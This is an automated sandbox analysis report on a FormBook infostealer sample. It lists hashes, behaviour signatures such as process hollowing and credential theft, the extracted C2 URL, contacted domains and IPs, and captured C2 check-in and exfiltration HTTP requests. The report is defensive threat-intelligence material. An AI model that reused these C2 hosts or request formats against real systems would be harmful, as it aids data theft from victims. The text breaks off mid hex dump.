Windows Analysis Report
NHYGUnNN.exe

Overview

General Information

Sample Name: NHYGUnNN.exe
Analysis ID: 756156
MD5: 4f9c8432b57fa1aa875071de547ba947
SHA1: e1cc52fd851621743ba562a65161bfafed8e6b2b
SHA256: 9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: NHYGUnNN.exe ReversingLabs: Detection: 27%
Source: Yara match File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: NHYGUnNN.exe Joe Sandbox ML: detected
Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.needook.com/4u5a/"]}
Source: NHYGUnNN.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose, 10_2_00BD2CA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_00BC88B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_00BC88AF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_00BC4376

Networking

Source: C:\Windows\explorer.exe Network Connect: 38.55.236.89 80
Source: C:\Windows\explorer.exe Domain query: www.darkchocolatebliss.com
Source: C:\Windows\explorer.exe Domain query: www.marketmall.digital
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.132 80
Source: C:\Windows\explorer.exe Network Connect: 54.38.220.85 80
Source: C:\Windows\explorer.exe Network Connect: 154.209.6.241 80
Source: C:\Windows\explorer.exe Network Connect: 89.31.143.1 80
Source: C:\Windows\explorer.exe Domain query: www.canadianlocalbusiness.com
Source: C:\Windows\explorer.exe Domain query: www.y31jaihdb6zm87.buzz
Source: C:\Windows\explorer.exe Network Connect: 162.213.255.142 80
Source: C:\Windows\explorer.exe Domain query: www.ope-cctv.com
Source: C:\Windows\explorer.exe Domain query: www.dersameh.com
Source: Traffic Snort IDS: 2829004 ETPRO TROJAN FormBook CnC Checkin (POST) 192.168.2.6:49722 -> 154.209.6.241:80
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: Malware configuration extractor URLs: www.needook.com/4u5a/
Source: Joe Sandbox View ASN Name: COGENT-174US
Source: Joe Sandbox View ASN Name: QSC-AG-IPXDE
Source: global traffic HTTP traffic detected:
  GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1
  Host: www.ope-cctv.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected:
  GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1
  Host: www.dersameh.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected:
  GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1
  Host: www.darkchocolatebliss.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected:
  GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1
  Host: www.y31jaihdb6zm87.buzz
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected:
  GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1
  Host: www.marketmall.digital
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected:
  GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1
  Host: www.canadianlocalbusiness.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View IP Address: 89.31.143.1
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.dersameh.com
  Connection: close
  Content-Length: 190
  Cache-Control: no-cache
  Origin: http://www.dersameh.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.dersameh.com/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.dersameh.com
  Connection: close
  Content-Length: 1454
  Cache-Control: no-cache
  Origin: http://www.dersameh.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.dersameh.com/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.darkchocolatebliss.com
  Connection: close
  Content-Length: 190
  Cache-Control: no-cache
  Origin: http://www.darkchocolatebliss.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.darkchocolatebliss.com/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: l0GX=kxk-HEmuCelWqNgG6yWDirHhy3TPpMciN70B~CeBRKw1t0AGW5w63BzQ~huKM-602epBwIiCkY0ujXaDgUgGGxJDKu58xM7zT4KVw_JT~ea_lGgP6ibKodd1vN3iIdZ5iRNVjlDvDYPlTnrkJdnZ8FjxhztnqZGD0Na6XPki61FS60wiVA(tip0.
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.darkchocolatebliss.com
  Connection: close
  Content-Length: 1454
  Cache-Control: no-cache
  Origin: http://www.darkchocolatebliss.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.darkchocolatebliss.com/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.y31jaihdb6zm87.buzz
  Connection: close
  Content-Length: 190
  Cache-Control: no-cache
  Origin: http://www.y31jaihdb6zm87.buzz
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.y31jaihdb6zm87.buzz/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.y31jaihdb6zm87.buzz
  Connection: close
  Content-Length: 190
  Cache-Control: no-cache
  Origin: http://www.y31jaihdb6zm87.buzz
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.y31jaihdb6zm87.buzz/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.y31jaihdb6zm87.buzz
  Connection: close
  Content-Length: 1454
  Cache-Control: no-cache
  Origin: http://www.y31jaihdb6zm87.buzz
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.y31jaihdb6zm87.buzz/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.marketmall.digital
  Connection: close
  Content-Length: 190
  Cache-Control: no-cache
  Origin: http://www.marketmall.digital
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.marketmall.digital/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: l0GX=z1yV~d~FGj03VrljX0uYxQGghe8U5b5nNx~PGnSbgcLWDOoshYS7g5HjO5vnw2gbpC1zXPIrJIWRtJDh4rVKSjuUxo(EPH~RKee4wKD7wj3xi1kNcfLrhceDtr76W1akL1wg7woOaXFWjk6sd-6E92CIB-Mwr-S6vNvlvKQwSxRDEvE9JWF2a6o.
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.marketmall.digital
  Connection: close
  Content-Length: 1454
  Cache-Control: no-cache
  Origin: http://www.marketmall.digital
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.marketmall.digital/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.canadianlocalbusiness.com
  Connection: close
  Content-Length: 190
  Cache-Control: no-cache
  Origin: http://www.canadianlocalbusiness.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.canadianlocalbusiness.com/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: l0GX=lCbw7QlVMFZggCOsYLKkJQGXvXFIIEp85Tej96u-5kzrXbz9CuykEJpwa4Y5rksN~H8jOBbXbXMDtgEzX03AjnYRb0UvTK6Z71YQlEXniQIEtdQ_suGP9FoKB4SNaVJMqnatyvpdsOv3nizQd34vhmE5grdl6-8Z~OsjcPFd(roXFC41URIjE1s.
Source: global traffic HTTP traffic detected:
  POST /4u5a/ HTTP/1.1
  Host: www.canadianlocalbusiness.com
  Connection: close
  Content-Length: 1454
  Cache-Control: no-cache
  Origin: http://www.canadianlocalbusiness.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.canadianlocalbusiness.com/4u5a/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 17:25:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 29 Nov 2022 17:25:25 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 17:11:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 17:12:05 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 17:12:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:25:51 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 
70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:25:53 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 